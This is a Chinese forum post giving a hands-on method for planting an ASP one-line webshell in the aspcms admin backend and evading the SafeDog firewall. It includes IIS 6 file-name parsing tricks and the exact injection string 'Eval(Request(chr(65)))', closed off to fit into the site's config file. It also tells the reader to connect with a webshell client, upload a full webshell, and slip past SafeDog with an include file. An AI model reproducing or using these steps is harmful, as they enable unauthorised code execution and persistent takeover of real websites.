找回密码
 注册
首页 ≡≡网络技术≡≡ 编程语言 aspcms后台插入一句话木马并绕过安全狗上传shell方法 ...

aspcms后台插入一句话木马并绕过安全狗上传shell方法

灰儿 2017-2-21 21:30:18
aspcms 在老版本在IIS 6.0中可以利两个漏洞来上传shell,具体操作如下:
利用IIS解析漏洞1:
登录后台的“模板选择”页面,修改模板文件夹为 “html.asp”,然后再进入“后台导航”,进入“编辑模版”,编辑“abou.thml”模版,在头部加入asp一句话木马。

利用IIS解析漏洞2:
  登录后台后点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写asp一句话木马。然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,菜刀连接之。上传一个大马即可。

以上方法仅限于是IIS6并且服务器没有安全狗软件,可是如果遇到安全狗或iis7.5呢,上面的方法就没有用了。以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法。

1、进入后台,“扩展功能”--“幻灯片设置”--”文字说明”

00.jpg

2、使用chorme浏览器的审查元素功能或者firefox的firebug功能,总之使用能修改当前页面元素的工具就好了。将“文字说明”表单对应的slideTextStatus的value的值,由原来的0修改为自带闭合原来配置文件脚本asp一句话木马,代码如下:
1%><%Eval(Request (chr(65)))%><%

02.jpg

一般而言,后台插一句话,如果有配置文件可以插的话,那肯定是插入配置文件了,但是插入配置文件有一个很大的风险,那就是一旦出错那么全盘皆输,有可能不仅仅造成后台无法登陆,甚至有可能是整个网站系统崩溃,所以插入配置文件,请慎之又慎 。

话归正题,本例中插入的一句话木马,是根目录下的/config/AspCms_Config.asp文件,那么我们需要来了解一下这个木马插入后的代码情况 ,相关原代码如下:Const slideHeight="244"        '高
Const slideTextStatus=0        '文字说明开关
Const slideNum=3        '文字说明开关

对于这样的配置插入一句话的话,我们的机会就是替换Const slideTextStatus=0中的数字0,那么需要闭合前面这段语句,同时要插入一句话,语句可以这样写:
1%><%Eval(Request (chr(65)))%><%

那么在AspCms_Config.asp中就是:

Const slideHeight="244"        '高
Const slideTextStatus=1%><%Eval(Request (chr(65)))%><%        '文字说明开关
Const slideNum=3        '文字说明开关

第一个 1%>就是闭合配置文件的前一段脚本,这里特别要注意“1”,如果没有这个“1”的话,那么必将出错 。之后插入一句话<%Eval(Request (chr(65)))%>,现在要闭合后面的一段脚本,所以加上<%。

好了,这是我这段一句话的构造的办法。

3、打开一句话木马客户端,网址输入:http://www.url.cn/config/AspCms_Config.asp,此段一句话的密码为a。通过此一句话上传一个大马。

4、提示上传成功,本以为大功告成,结果用大马网址查看时。恶心的安全狗出来咬我了,提示如下:
安全狗.jpg

机智的我马上想到用文件包含,与时又上传了一个asp文件,内容如下:
<!--#include file="kenn.asp"-->

5.访问看看,大功告成,终于绕过安全狗的拦截了,以下为大马界面:
大马.jpg

您需要登录后才可以回帖 登录 | 注册
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言 了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言 了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。